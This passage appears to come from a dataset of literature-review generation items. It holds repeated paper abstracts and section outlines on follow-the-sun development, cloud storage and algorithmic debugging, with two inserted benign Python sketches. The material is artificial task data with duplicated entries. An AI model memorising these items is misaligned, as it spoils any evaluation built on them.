productivity. We combine the conceptual analysis with a description of our FTS exploratory comparative field studies and draw out their key findings and learning. The main implication of this paper is that understanding calendar efficiency, handoff efficiency, within-site coordination, and cross-site coordination is necessary to evaluate whether FTS is to be successful in reducing software development duration. --- paper_title: FTSProc: A Process to Alleviate the Challenges of Projects that Use the Follow-the-Sun Strategy paper_content: Searching for competitive advantages such as low cost and productivity gains, organizations choose to distribute their software development to other countries with more affordable production costs. Increasingly, projects are being developed in geographically distributed environments, characterizing distributed software development. However, the challenges inherent in this software development environment are significant. Among these challenges is the time zone difference, which can also be exploited as an advantage through the use of follow-the-sun development. However, the follow-the-sun strategy presents some challenges, mainly around the handoffs. Therefore, this experimental research focuses on presenting a development process to alleviate the challenges found in projects that use this strategy, focusing on the development phase of the SDLC. It also performs an experiment to evaluate the efficiency of the created process. In this experiment, evidence was found that the created process actually alleviates the challenges found in the follow-the-sun strategy. --- paper_title: Leveraging temporal and spatial separations with the 24-hour knowledge factory paradigm paper_content: The 24-H Knowledge Factory facilitates collaboration between geographically and temporally distributed teams. The teams themselves form a strategic partnership whose joint efforts contribute to the completion of a project.
Project-related tasks are likewise distributed, allowing tasks to be completed on a continuous basis, regardless of the constraints of any one team's working hours. However, distributing a single task between multiple teams necessitates a handoff process, where one team's development efforts and task planning are communicated from one team ending their shift to the next that will continue the effort. Data management is, therefore, critical to the success of this business model. Efficiency in data management is achieved through a strategic leveraging of key tools, models, and concepts. --- paper_title: Patterns in Effective Distributed Software Development paper_content: As with many other industries today, software development must increasingly adapt to teams whose members work together but are geographically distributed. Many factors have contributed to this rise in distributed software development (DSD), including companies' desires to leverage skilled resources wherever they can be found and to reduce costs by working in different labor markets. Its increasing popularity has led to diverse industrial experience, which has in turn led to some best practices and an initial body of knowledge. --- paper_title: A reference model for successful Distributed Development of Software Systems paper_content: Distributed development (DD) of software systems is an issue of increasing significance for organisations today, all the more so given the current trend towards globalisation. In this paper we present a reference model which can be used as a reference point for any company wishing to review their own DD scenario. This is particularised in two forms, one as an exemplar model for a global (GSD) development scenario and one as a particularisation of this for intra-national DD scenarios. By drawing from eight case-studies on DD, we present ten general strategies for successful DD together with our reference model which characterises an ideal DD situation. --- paper_title: Mapping Global Software Development Practices for Follow-the-Sun Process paper_content: Several organizations are developing software twenty-four hours a day, seven days per week, with geographically distributed teams. This software development environment makes it possible to implement the Follow-the-Sun (FTS) strategy. In this study, we perform a mapping of the literature, based upon electronic searches of digital libraries, to identify practices applied in twenty-four-hour development environments in which the FTS strategy can be applied. Our results present practices and many key aspects of FTS implementation. --- paper_title: Modelling software development across time zones paper_content: Economic factors and the World Wide Web are turning software usage and its development into global activities. Many benefits accrue from global development, not least from the opportunity to reduce time-to-market through 'around the clock' working. This paper identified some of the factors and constraints that influence time-to-market when software is developed across time zones. It describes a model of the relationships between development time and the factors and overheads associated with such a pattern of work. The paper also reports on a small-scale empirical study of software development across time zones and presents some lessons learned and conclusions drawn from the theoretical and empirical work carried out. --- paper_title: Culture in Global Software Development - A Weakness or Strength?
paper_content: Cultural diversity is assumed to be a fundamental issue in global software development. Research carried out to date has raised concerns over how to manage cultural differences in global software development. Our empirical research in India, a major outsourcing destination, has helped us investigate this complex issue of global software development. A triangulated study based on a questionnaire, telephonic interviews and structured face-to-face interviews with 15 Project Managers and Senior Executives has revealed how they cope with the demands of cultural differences imposed by a geographically distributed environment. This research study brings forward various techniques initiated by these project managers to deal with cultural differences that exist within geographically distributed software development teams. We also discuss different strategies and make a case to explain how to build on and take advantage of cultural differences that exist in global software development. --- paper_title: Selecting Locations for Follow-the-Sun Software Development: Towards a Routing Model paper_content: Deciding where to establish development locations is a strategic decision in the field of Follow-the-Sun software development. Our research has focussed on two factors: a. the optimal time zone difference between locations, and b. the natural ease of communication. The former depends on the required transfer time for handing over work from one location to the other. The latter involves communication aspects such as language. The objective is to construct a routing model, which calculates (sub)optimal deployment routes. The routing model consists of an algorithm that calculates sequences of locations from a dataset containing demographic data about these locations. The possible sequences are prioritized based on a set of parameters. The routing model has been implemented in a website. The website can be used to validate the routing model, but moreover can be used as a first support when considering potential locations for Follow-the-Sun software development. --- paper_title: Use of collaborative technologies and knowledge sharing in co-located and distributed teams: Towards the 24-h knowledge factory paper_content: The relocation of knowledge work to emerging countries is leading to an increasing use of globally distributed teams (GDT) engaged in complex tasks. In the present study, we investigate a particular type of GDT working 'around the clock': the 24-h knowledge factory (Gupta, 2008). Adopting the productivity perspective on knowledge sharing (Haas and Hansen, 2005, 2007), we hypothesize how a 24-h knowledge factory and a co-located team will differ in technology use, knowledge sharing processes, and performance. We conducted a quasi-experiment in IBM, collecting both quantitative and qualitative data, over a period of 12months, on a GDT and a co-located team. Both teams were composed of the same number of professionals, provided with the same technologies, engaged in similar tasks, and given similar deadlines. We found significant differences in their use of technologies and in knowledge sharing processes, but not in efficiency and quality of outcomes. We show how the co-located team and the GDT enacted a knowledge codification strategy and a personalization strategy, respectively; in each case grafting elements of the other strategy in order to attain both knowledge re-use and creativity. 
We conclude by discussing theoretical contributions to knowledge sharing and GDT literatures, and by highlighting managerial implications for those organizations interested in developing a fully functional 24-h knowledge factory. --- paper_title: The object-oriented team: Lessons for virtual teams from global software development paper_content: We investigated coordination and communication processes in global virtual software development teams in three Indian multinational technology firms. While some of the teams in our study experienced many of the same things observed in prior research, some operated in strikingly different ways, so different, in fact, that they led us to propose a new type of organization for global virtual teams: the object-oriented team. In contrast to the traditional virtual team approach which strives to tightly couple team members through information rich media such as face-to-face and telephone communication, the object-oriented team strives to decouple team members through the use of well defined processes and semantically rich media that clarify, extend and constrain meaning. We believe the set of principles embodied in the object-oriented team may be applicable to many types of virtual teams, especially larger teams facing complex problems. --- paper_title: Your time zone or mine?: a study of globally time zone-shifted collaboration paper_content: We conducted interviews with sixteen members of teams that worked across global time zone differences. Despite time zone differences of about eight hours, collaborators still found time to synchronously meet. The interviews identified the diverse strategies teams used to find time windows to interact, which often included times outside of the normal workday and connecting from home to participate. Recent trends in increased work connectivity from home and blurred boundaries between work and home enabled more scheduling flexibility. While email use was understandably prevalent, there was also general interest in video, although obstacles remain for widespread usage. We propose several design implications for supporting this growing population of workers that need to span global time zone differences. --- paper_title: Agile Software Processes for the 24-Hour Knowledge Factory Environment paper_content: The growing adoption of outsourcing and offshoring concepts is presenting new opportunities for distributed software development. Inspired by the paradigm of round-the-clock manufacturing, the concept of the 24-hour knowledge factory (24HrKF) attempts to make similar transformations in the arena of IS: specifically to transform the production of software and allied intangibles to benefit from the notion of continuous development by establishing multiple collaborating sites at strategically selected locations around the globe. As the sun sets on one site, it rises on another site with the day's work being handed off from the closing site to the opening site. In order to enable such hand offs to occur in an effective manner, new agile and distributed software processes are needed, as delineated in this article. --- paper_title: Follow the Sun Workflow in Global Software Development paper_content: Follow the sun (FTS) has interesting appeal: hand off work at the end of every day from one site to the next, many time zones away, in order to speed up product development.
Although the potential effect on "time to market" can be profound, at least conceptually, FTS has enjoyed few documented industry successes because it is acknowledged to be extremely difficult to implement. In order to address this "FTS challenge," we provide here a conceptual foundation and formal definition of FTS. We then analyze the conditions under which FTS can be successful in reducing duration in software development. We show that handoff efficiency is paramount to successful FTS practices and that duration can be reduced only when lower within-site coordination and improved personal productivity outweigh the corresponding increase in cross-site coordination. We also develop 12 research propositions based on fundamental issues surrounding FTS, such as calendar efficiency, development method, product architecture and handoff efficiency, within-site coordination, cross-site coordination, and personal productivity. We combine the conceptual analysis with a description of our FTS exploratory comparative field studies and draw out their key findings and learning. The main implication of this paper is that understanding calendar efficiency, handoff efficiency, within-site coordination, and cross-site coordination is necessary to evaluate whether FTS will be successful in reducing software development duration. --- paper_title: FTSProc: A Process to Alleviate the Challenges of Projects that Use the Follow-the-Sun Strategy paper_content: Searching for competitive advantages such as low cost and productivity gains, organizations choose to distribute their software development to other countries with more affordable production costs. Increasingly, projects are being developed in geographically distributed environments, featuring distributed software development. However, the challenges inherent in this software development environment are significant. Among these challenges is the time zone difference, which can also be tackled as an advantage, through the use of follow-the-sun development. However, the follow-the-sun strategy presents some challenges, mainly alongside the handoffs. Therefore, this experimental research focuses on presenting a development process to alleviate the challenges found in projects that use this strategy, focusing on the development phase of the SDLC. Additionally, it performs an experiment to evaluate the created process's efficiency. In this experiment, evidence was found that the created process actually alleviates the challenges found in the follow-the-sun strategy. --- paper_title: Management at the Outsourcing Destination - Global Software Development in India paper_content: In Global Software Engineering Research, there have been many studies carried out from the perspective of the company that is outsourcing software development. However, very few studies focus on the companies to whom the software development is being outsourced. In this paper, we highlight India as a major outsourcing destination and present experience from companies that manage outsourced software development. In carrying out this activity, Indian software companies have confronted various issues which are local, remote, internal and external and for which solutions have been instigated. This paper presents research carried out within Indian software companies in which we investigated issues faced when implementing global software development and the solutions used by these companies.
We present these solutions so that they can be followed by other outsourcing destinations thus enabling them to operate successfully across geographical, national and international cultural boundaries. --- paper_title: Global Software Development Challenges: A Case Study on Temporal, Geographical and Socio-Cultural Distance paper_content: Global software development (GSD) is a phenomenon that is receiving considerable interest from companies all over the world. In GSD, stakeholders from different national and organizational cultures are involved in developing software and the many benefits include access to a large labour pool, cost advantage and round-the-clock development. However, GSD is technologically and organizationally complex and presents a variety of challenges to be managed by the software development team. In particular, temporal, geographical and socio-cultural distances impose problems not experienced in traditional systems development. In this paper, we present findings from a case study in which we explore the particular challenges associated with managing GSD. Our study also reveals some of the solutions that are used to deal with these challenges. We do so by empirical investigation at three US based GSD companies operating in Ireland. Based on qualitative interviews we present challenges related to temporal, geographical and socio-cultural distance. --- paper_title: Follow the Sun Workflow in Global Software Development paper_content: Follow the sun (FTS) has interesting appeal: hand off work at the end of every day from one site to the next, many time zones away, in order to speed up product development. Although the potential effect on "time to market" can be profound, at least conceptually, FTS has enjoyed few documented industry successes because it is acknowledged to be extremely difficult to implement. In order to address this "FTS challenge," we provide here a conceptual foundation and formal definition of FTS. We then analyze the conditions under which FTS can be successful in reducing duration in software development. We show that handoff efficiency is paramount to successful FTS practices and that duration can be reduced only when lower within-site coordination and improved personal productivity outweigh the corresponding increase in cross-site coordination. We also develop 12 research propositions based on fundamental issues surrounding FTS, such as calendar efficiency, development method, product architecture and handoff efficiency, within-site coordination, cross-site coordination, and personal productivity. We combine the conceptual analysis with a description of our FTS exploratory comparative field studies and draw out their key findings and learning. The main implication of this paper is that understanding calendar efficiency, handoff efficiency, within-site coordination, and cross-site coordination is necessary to evaluate whether FTS will be successful in reducing software development duration. --- paper_title: FTSProc: A Process to Alleviate the Challenges of Projects that Use the Follow-the-Sun Strategy paper_content: Searching for competitive advantages such as low cost and productivity gains, organizations choose to distribute their software development to other countries with more affordable production costs. Increasingly, projects are being developed in geographically distributed environments, featuring distributed software development. However, the challenges inherent in this software development environment are significant.
Among these challenges is the time zone difference, which can also be tackled as an advantage, through the use of follow-the-sun development. However, the follow-the-sun strategy presents some challenges, mainly alongside the handoffs. Therefore, this experimental research focuses on presenting a development process to alleviate the challenges found in projects that use this strategy, focusing on the development phase of the SDLC. Additionally, it performs an experiment to evaluate the created process's efficiency. In this experiment, evidence was found that the created process actually alleviates the challenges found in the follow-the-sun strategy. --- paper_title: Leveraging temporal and spatial separations with the 24-hour knowledge factory paradigm paper_content: The 24-H Knowledge Factory facilitates collaboration between geographically and temporally distributed teams. The teams themselves form a strategic partnership whose joint efforts contribute to the completion of a project. Project-related tasks are likewise distributed, allowing tasks to be completed on a continuous basis, regardless of the constraints of any one team's working hours. However, distributing a single task between multiple teams necessitates a handoff process, where one team's development efforts and task planning are communicated from one team ending their shift to the next that will continue the effort. Data management is, therefore, critical to the success of this business model. Efficiency in data management is achieved through a strategic leveraging of key tools, models, and concepts. --- paper_title: Management at the Outsourcing Destination - Global Software Development in India paper_content: In Global Software Engineering Research, there have been many studies carried out from the perspective of the company that is outsourcing software development. However, very few studies focus on the companies to whom the software development is being outsourced. In this paper, we highlight India as a major outsourcing destination and present experience from companies that manage outsourced software development. In carrying out this activity, Indian software companies have confronted various issues which are local, remote, internal and external and for which solutions have been instigated. This paper presents research carried out within Indian software companies in which we investigated issues faced when implementing global software development and the solutions used by these companies. We present these solutions so that they can be followed by other outsourcing destinations thus enabling them to operate successfully across geographical, national and international cultural boundaries. ---
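The Follow the Sun references above argue that calendar gains hinge on handoff efficiency and on the balance between within-site and cross-site coordination. The sketch below makes that trade-off concrete with a deliberately simple duration model; the formula, parameter names, and default values are assumptions introduced here for illustration and are not the models proposed in the cited papers.

```python
# Back-of-the-envelope model of follow-the-sun (FTS) calendar duration.
# The linear "productive hours minus handoff overhead" model is an
# illustrative assumption, not taken from any of the cited papers.

def fts_duration_days(effort_hours: float,
                      sites: int = 2,
                      shift_hours: float = 8.0,
                      handoff_overhead_hours: float = 1.0) -> float:
    """Calendar days to finish a task when sites work consecutive shifts.

    Each site works one shift per day and loses some productive time to
    the daily handoff (writing and reading handoff notes, clarifications).
    """
    productive_per_day = sites * (shift_hours - handoff_overhead_hours)
    if productive_per_day <= 0:
        raise ValueError("handoff overhead consumes the entire shift")
    return effort_hours / productive_per_day


def single_site_duration_days(effort_hours: float, shift_hours: float = 8.0) -> float:
    return effort_hours / shift_hours


if __name__ == "__main__":
    effort = 320.0  # person-hours on the critical path
    for overhead in (0.5, 2.0, 4.0):
        fts = fts_duration_days(effort, handoff_overhead_hours=overhead)
        print(f"overhead {overhead} h/site/day: FTS {fts:.1f} days "
              f"vs single site {single_site_duration_days(effort):.1f} days")
```

Even this toy model reproduces the qualitative claim above: with two sites and eight-hour shifts, four hours of daily handoff overhead per site erases the calendar advantage entirely, while half an hour of overhead nearly halves the duration.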
Title: A Systematic Literature Review of Best Practices and Challenges in Follow-the-Sun Software Development Section 1: Introduction Description 1: Introduce the concept of Follow-the-Sun (FTS) in Global Software Development (GSD), state the aim of the study, and provide an overview of the paper structure. Section 2: Follow-the-Sun Software Development Description 2: Define and describe the concept of Follow-the-Sun in the context of software development, its purpose, and key operational elements such as handoff. Section 3: Research Method Description 3: Explain the systematic literature review (SLR) methodology used, including the research protocol, data sources, search strings, selection process, data extraction, and validity threats. Section 4: Results Description 4: Present the findings of the study based on the research questions, detailing the identified challenges and best practices in FTS. Section 5: Discussion Description 5: Analyze the results, discuss the frequencies and significance of identified challenges and best practices, and highlight insights and implications for future research and practice. Section 6: Conclusions and Future Work Description 6: Summarize the key conclusions of the study, discuss its contributions to the field, and propose directions for future research.
A Survey on Cloud Storage
5
--- paper_title: Compute and Storage Clouds Using Wide Area High Performance Networks paper_content: We describe a cloud-based infrastructure that we have developed that is optimized for wide area, high performance networks and designed to support data mining applications. The infrastructure consists of a storage cloud called Sector and a compute cloud called Sphere. We describe two applications that we have built using the cloud and some experimental studies. --- paper_title: The Google file system paper_content: We have designed and implemented the Google File System, a scalable distributed file system for large distributed data-intensive applications. It provides fault tolerance while running on inexpensive commodity hardware, and it delivers high aggregate performance to a large number of clients. While sharing many of the same goals as previous distributed file systems, our design has been driven by observations of our application workloads and technological environment, both current and anticipated, that reflect a marked departure from some earlier file system assumptions. This has led us to reexamine traditional choices and explore radically different design points. The file system has successfully met our storage needs. It is widely deployed within Google as the storage platform for the generation and processing of data used by our service as well as research and development efforts that require large data sets. The largest cluster to date provides hundreds of terabytes of storage across thousands of disks on over a thousand machines, and it is concurrently accessed by hundreds of clients. In this paper, we present file system interface extensions designed to support distributed applications, discuss many aspects of our design, and report measurements from both micro-benchmarks and real world use. --- paper_title: Market-Oriented Cloud Computing: Vision, Hype, and Reality for Delivering IT Services as Computing Utilities paper_content: This keynote paper: presents a 21 st century vision of computing; identifies various computing paradigms promising to deliver the vision of computing utilities; defines Cloud computing and provides the architecture for creating market-oriented Clouds by leveraging technologies such as VMs; provides thoughts on marketbased resource management strategies that encompass both customer-driven service management and computational risk management to sustain SLA-oriented resource allocation; presents some representative Cloud platforms especially those developed in industries along with our current work towards realising market-oriented resource allocation of Clouds by leveraging the 3 rd generation Aneka enterprise Grid technology; reveals our early thoughts on interconnecting Clouds for dynamically creating an atmospheric computing environment along with pointers to future community research; and concludes with the need for convergence of competing IT paradigms for delivering our 21 st century vision. --- paper_title: MapReduce: simplified data processing on large clusters paper_content: MapReduce is a programming model and an associated implementation for processing and generating large datasets that is amenable to a broad variety of real-world tasks. Users specify the computation in terms of a map and a reduce function, and the underlying runtime system automatically parallelizes the computation across large-scale clusters of machines, handles machine failures, and schedules inter-machine communication to make efficient use of the network and disks. 
Programmers find the system easy to use: more than ten thousand distinct MapReduce programs have been implemented internally at Google over the past four years, and an average of one hundred thousand MapReduce jobs are executed on Google's clusters every day, processing a total of more than twenty petabytes of data per day. --- paper_title: Bigtable: A Distributed Storage System for Structured Data paper_content: Bigtable is a distributed storage system for managing structured data that is designed to scale to a very large size: petabytes of data across thousands of commodity servers. Many projects at Google store data in Bigtable, including web indexing, Google Earth, and Google Finance. These applications place very different demands on Bigtable, both in terms of data size (from URLs to web pages to satellite imagery) and latency requirements (from backend bulk processing to real-time data serving). Despite these varied demands, Bigtable has successfully provided a flexible, high-performance solution for all of these Google products. In this paper we describe the simple data model provided by Bigtable, which gives clients dynamic control over data layout and format, and we describe the design and implementation of Bigtable. --- paper_title: The Google file system paper_content: We have designed and implemented the Google File System, a scalable distributed file system for large distributed data-intensive applications. It provides fault tolerance while running on inexpensive commodity hardware, and it delivers high aggregate performance to a large number of clients. While sharing many of the same goals as previous distributed file systems, our design has been driven by observations of our application workloads and technological environment, both current and anticipated, that reflect a marked departure from some earlier file system assumptions. This has led us to reexamine traditional choices and explore radically different design points. The file system has successfully met our storage needs. It is widely deployed within Google as the storage platform for the generation and processing of data used by our service as well as research and development efforts that require large data sets. The largest cluster to date provides hundreds of terabytes of storage across thousands of disks on over a thousand machines, and it is concurrently accessed by hundreds of clients. In this paper, we present file system interface extensions designed to support distributed applications, discuss many aspects of our design, and report measurements from both micro-benchmarks and real world use. --- paper_title: Compute and Storage Clouds Using Wide Area High Performance Networks paper_content: We describe a cloud-based infrastructure that we have developed that is optimized for wide area, high performance networks and designed to support data mining applications. The infrastructure consists of a storage cloud called Sector and a compute cloud called Sphere. We describe two applications that we have built using the cloud and some experimental studies. --- paper_title: Data Mining Using High Performance Data Clouds: Experimental Studies Using Sector and Sphere paper_content: We describe the design and implementation of a high performance cloud that we have used to archive, analyze and mine large distributed data sets. By a cloud, we mean an infrastructure that provides resources and/or services over the Internet. A storage cloud provides storage services, while a compute cloud provides compute services. 
We describe the design of the Sector storage cloud and how it provides the storage services required by the Sphere compute cloud. We also describe the programming paradigm supported by the Sphere compute cloud. Sector and Sphere are designed for analyzing large data sets using computer clusters connected with wide area high performance networks (for example, 10+ Gb/s). We describe a distributed data mining application that we have developed using Sector and Sphere. Finally, we describe some experimental studies comparing Sector/Sphere to Hadoop. --- paper_title: Provably secure authentication protocol based on convertible proxy signcryption in cloud computing paper_content: Mutual authentication between the user and the public cloud is essential requirement for the user to access the public cloud in cloud computing. In 2011, Juang et al. proposed a first authentication scheme based on proxy signature. The advantage of the scheme is that the user only needs to register on his home service cloud (HSC), and can pass through the authentication of the public cloud with the help of his HSC. However, their scheme has three weaknesses: 1) the user's HSC needs to update the user's public key in each session to protect the user's privacy; 2) HSC may suffer from network jam when many users in the same HSC need to register on different public clouds simultaneously; and 3) a secret key should be shared between HSC and visiting cloud. To overcome these weaknesses, a provably secure convertible proxy signcryption for privacy preserving is proposed. Based on this scheme, a novel one-round authentication protocol is proposed, which the user only needs to register on his HSC, and can pass through the authentication of the visiting cloud without the help of his HSC. On the other hand, the proposed protocol can provide some nice properties, such as user privacy protection, non-repudiation, without updating the user's public key, and secret key does not have to be shared between HSC and visiting cloud. In addition, the proposed scheme is provably secure in the random oracle model, and is more efficient than Juang et al.'s scheme. --- paper_title: ZettaDS: A Light-weight Distributed Storage System for Cluster paper_content: We have designed and implemented the Zetta data storage system (ZettaDS), a light-weight scalable distributed data storage system for cluster. While sharing many common characters with some of modern distributed data storage systems such as single meta server architecture, running on inexpensive commodity components, our system is a very light-weight one and aims to handle lots of small files efficiently. The emphases of our design are on scalability of storage capacity and manageability. Throughput and performance are considered secondary. Furthermore, ZettaDS is designed to minimize the resource consumption due to running on a non-dedicated system.The paper describes the details and rationales of the design and implementation. Also, we evaluate our system by some experiments. The results demonstrate that our system can use the storage spaces more efficiently and achieve better transfer performance when facing a large number of small files. --- paper_title: Sector and Sphere: the design and implementation of a high-performance data cloud paper_content: Cloud computing has demonstrated that processing very large datasets over commodity clusters can be done simply, given the right programming model and infrastructure. 
In this paper, we describe the design and implementation of the Sector storage cloud and the Sphere compute cloud. By contrast with the existing storage and compute clouds, Sector can manage data not only within a data centre, but also across geographically distributed data centres. Similarly, the Sphere compute cloud supports user-defined functions (UDFs) over data both within and across data centres. As a special case, MapReduce-style programming can be implemented in Sphere by using a Map UDF followed by a Reduce UDF. We describe some experimental studies comparing Sector/Sphere and Hadoop using the Terasort benchmark. In these studies, Sector is approximately twice as fast as Hadoop. Sector/Sphere is open source. --- paper_title: Rethinking deduplication in cloud: From data profiling to blueprint paper_content: Cloud storage system is becoming the substantial component of the cloud system due to emerging trend of user data. Different from other computing resources, storage resource is vulnerable to the cost issue since the data should be maintained during the downtime. In this paper, we investigate the benefit and overhead when deduplication techniques are adopted to the cloud storage system. From the result, we discuss several challenges across the cloud storage. Furthermore, we suggest the cloud storage architecture and the deduplication engine to optimize the deduplication feature in the cloud storage system. We expect that our suggestions reduce the cloud storage system cost efficiently without performance degradation of data transfer. --- paper_title: Cloud context-based onboard data compression paper_content: A simplified cloud mask algorithm suitable for present-day onboard processing is developed based on the operational MODIS cloud mask algorithm. The code is reduced to less than 45% of its original size while retaining 90% of the accuracy. Clear sky data compression is tested using our simplified cloud mask followed by application of the CCSDS lossless compression algorithm. For most of the channels, compressing the cloud masked MODIS L1B data can reduce the data volume by about 40% compared with compression without using cloud mask. The cloud mask was also applied to L1A data with comparable or even better data reduction performance depending on local data filling schemes. The cloud mask itself can be compressed to less than 0.5 bit-per-pixel. This paper summarizes our approach and provides results in detail. --- paper_title: Evaluating Cloud Platform Architecture with the CARE Framework paper_content: There is an emergence of Cloud application platforms such as Microsoft’s Azure, Google’s App Engine and Amazon’s EC2/SimpleDB/S3. Startups and Enterprise alike, lured by the promise of ‘infinite scalability’, ‘ease of development’, ‘low infrastructure setup cost’ are increasingly using these Cloud service building blocks to develop and deploy their web based applications. However, the precise nature of these Cloud platforms and the resultant Cloud application runtime behavior is still largely an unknown. Given the black box nature of these platforms, and the novel programming and data models of Cloud, there is a dearth of tools and techniques for enabling the rigorously evaluation of Cloud platforms at runtime. This paper introduces the CARE (Cloud Architecture Runtime Evaluation) approach, a framework for evaluating Cloud application development and runtime platforms. 
CARE implements a unified interface with WSDL and REST in order to evaluate different Cloud platforms for Cloud application hosting servers and Cloud databases. With the unified interface, we are able to perform selective high stress and low stress evaluations corresponding to desired test scenarios. Result shows the effectiveness of CARE in the evaluation of Cloud variations in terms of scalability, availability and responsiveness, across both compute and storage capabilities. Thus placing CARE as an important tool in the path of Cloud computing research. --- paper_title: A Secure Cloud Backup System with Assured Deletion and Version Control paper_content: Cloud storage is an emerging service model that enables individuals and enterprises to outsource the storage of data backups to remote cloud providers at a low cost. However, cloud clients must enforce security guarantees of their outsourced data backups. We present Fade Version, a secure cloud backup system that serves as a security layer on top of today's cloud storage services. Fade Version follows the standard version-controlled backup design, which eliminates the storage of redundant data across different versions of backups. On top of this, Fade Version applies cryptographic protection to data backups. Specifically, it enables fine-grained assured deletion, that is, cloud clients can assuredly delete particular backup versions or files on the cloud and make them permanently inaccessible to anyone, while other versions that share the common data of the deleted versions or files will remain unaffected. We implement a proof-of-concept prototype of Fade Version and conduct empirical evaluation atop Amazon S3. We show that Fade Version only adds minimal performance overhead over a traditional cloud backup service that does not support assured deletion. --- paper_title: General survey on massive data encryption paper_content: With the rapid development of Cloud computing, Internet of Things and social network technologies, the network data are increasing dramatically. The security of massive data interaction has attracted more and more attention in recently years. This paper discusses the encryption principles, advantages and disadvantages of some mainstream massive data encryption technologies, i.e., the encryption technology based on modern cryptosystem, the encryption technology based on parallel and distributed computing, the encryption technology based on biological engineering, and Attribute-based massive data encryption technology. Finally, we outlook the need-to-be solved problems and development trend of the massive data encryption technology. ---
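Several of the storage-cloud references above (notably MapReduce and Sector/Sphere) are built around the map/reduce programming model, in which the user supplies only a map function and a reduce function and the framework handles grouping and distribution. The single-process sketch below illustrates that contract with the classic word-count example; it is a toy under obvious assumptions and omits everything that makes the real systems interesting, such as distribution across a cluster, fault tolerance, locality, and persistent storage.

```python
# Minimal in-memory sketch of the map/reduce programming model: the user
# supplies map and reduce functions, the runner performs the grouping
# ("shuffle"). Illustrative only; not the Google or Hadoop implementation.
from collections import defaultdict
from typing import Callable, Iterable, List, Tuple

KV = Tuple[str, int]

def run_mapreduce(records: Iterable[str],
                  map_fn: Callable[[str], Iterable[KV]],
                  reduce_fn: Callable[[str, List[int]], KV]) -> List[KV]:
    # Map phase: emit intermediate key/value pairs.
    intermediate = defaultdict(list)
    for record in records:
        for key, value in map_fn(record):
            intermediate[key].append(value)
    # Reduce phase: combine all values that share a key.
    return [reduce_fn(key, values) for key, values in intermediate.items()]

# Classic word-count example.
def wc_map(line: str) -> Iterable[KV]:
    for word in line.split():
        yield word.lower(), 1

def wc_reduce(word: str, counts: List[int]) -> KV:
    return word, sum(counts)

if __name__ == "__main__":
    lines = ["the quick brown fox", "the lazy dog", "the fox"]
    print(sorted(run_mapreduce(lines, wc_map, wc_reduce)))
```

Running it prints the per-word counts for the three sample lines, mirroring the per-key reduction that a distributed implementation would perform across many machines.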
Title: A Survey on Cloud Storage Section 1: INTRODUCTION Description 1: This section introduces the concept of cloud storage, its significance in IT projects, and the distinctions between public, private, and hybrid cloud storage. Section 2: INTRODUCTION FORMATION OF CLOUD COMPUTING Description 2: This section traces the evolution of cloud computing concepts, the emergence of cloud storage as part of this evolution, and the role of major technology companies in advancing cloud storage technologies. Section 3: CORE TECHNOLOGY OF CLOUD STORAGE Description 3: This section discusses the fundamental technologies underpinning cloud storage, including Google File System (GFS), Hadoop Distributed File System (HDFS), and other high-performance storage technologies. Section 4: CLOUD STORAGE RESEARCHS Description 4: This section reviews current research and developments in cloud storage, examining high-performance distributed file systems, private storage clouds, and various academic contributions to the field. Section 5: CONCLUSIONS AND FUTURE WORK Description 5: This section summarizes the advantages of cloud storage over traditional storage solutions and outlines potential future research directions in cloud storage technology.
A survey on algorithmic debugging strategies
6
--- paper_title: Algorithmic Program Debugging paper_content: The thesis lays a theoretical framework for program debugging, with the goal of partly mechanizing this activity. In particular, we formalize and develop algorithmic solutions to the following two questions: (1) How do we identify a bug in a program that behaves incorrectly? (2) How do we fix a bug, once one is identified? ::: We develop interactive diagnosis algorithms that identify a bug in a program that behaves incorrectly, and implement them in Prolog for the diagnosis of Prolog programs. Their performance suggests that they can be the backbone of debugging aids that go far beyond what is offered by current programming environments. ::: We develop an inductive inference algorithm that synthesizes logic programs from examples of their behavior. The algorithm incorporates the diagnosis algorithms as a component. It is incremental, and progresses by debugging a program with respect to the examples. The Model Inference System is a Prolog implementation of the algorithm. Its range of applications and efficiency is comparable to existing systems for program synthesis from examples and grammatical inference. ::: We develop an algorithm that can fix a bug that has been identified, and integrate it with the diagnosis algorithms to form an interactive debugging system. By restricting the class of bugs we attempt to correct, the system can debug programs that are too complex for the Model Inference System to synthesize. --- paper_title: Algorithmic Program Debugging paper_content: The thesis lays a theoretical framework for program debugging, with the goal of partly mechanizing this activity. In particular, we formalize and develop algorithmic solutions to the following two questions: (1) How do we identify a bug in a program that behaves incorrectly? (2) How do we fix a bug, once one is identified? ::: We develop interactive diagnosis algorithms that identify a bug in a program that behaves incorrectly, and implement them in Prolog for the diagnosis of Prolog programs. Their performance suggests that they can be the backbone of debugging aids that go far beyond what is offered by current programming environments. ::: We develop an inductive inference algorithm that synthesizes logic programs from examples of their behavior. The algorithm incorporates the diagnosis algorithms as a component. It is incremental, and progresses by debugging a program with respect to the examples. The Model Inference System is a Prolog implementation of the algorithm. Its range of applications and efficiency is comparable to existing systems for program synthesis from examples and grammatical inference. ::: We develop an algorithm that can fix a bug that has been identified, and integrate it with the diagnosis algorithms to form an interactive debugging system. By restricting the class of bugs we attempt to correct, the system can debug programs that are too complex for the Model Inference System to synthesize. --- paper_title: Generalized algorithmic debugging and testing paper_content: This paper presents a method for semi-automatic bug localization, generalized algorithmic debugging, which has been integrated with the category partition method for functional testing. In this way the efficiency of the algorithmic debugging method for bug localization can be improved by using test specifications and test results. 
The long-range goal of this work is a semi-automatic debugging and testing system which can be used during large-scale program development of nontrivial programs. The method is generally applicable to procedural languages and is not dependent on any ad hoc assumptions regarding the subject program. The original form of algorithmic debugging, introduced by Shapiro, was however limited to small Prolog programs without side-effects, but has later been generalized to concurrent logic programming languages. Another drawback of the original method is the large number of interactions with the user during bug localization. To our knowledge, this is the first method which uses category partition testing to improve the bug localization properties of algorithmic debugging. The method can avoid irrelevant questions to the programmer by categorizing input parameters and then match these against test cases in the test database. Additionally, we use program slicing, a data flow analysis technique, to dynamically compute which parts of the program are relevant for the search, thus further improving bug localization. We believe that this is the first generalization of algorithmic debugging for programs with side-effects written in imperative languages such as Pascal. These improvements together makes it more feasible to debug larger programs. However, additional improvements are needed to make it handle pointer-related side-effects and concurrent Pascal programs. A prototype generalized algorithmic debugger for a Pascal subset without pointer side-effects and a test case generator for application programs in Pascal, C, dBase, and LOTUS have been implemented. --- paper_title: Declarative debugging for lazy functional languages paper_content: Lazy functional languages are declarative and allow the programmer to write programs where operational issues such as the evaluation order are left implicit. It is desirable to maintain a declarative view also during debugging so as to avoid burdening the programmer with operational details, for example concerning the actual evaluation order which tends to be difficult to follow. Conventional debugging techniques focus on the operational behaviour of a program and thus do not constitute 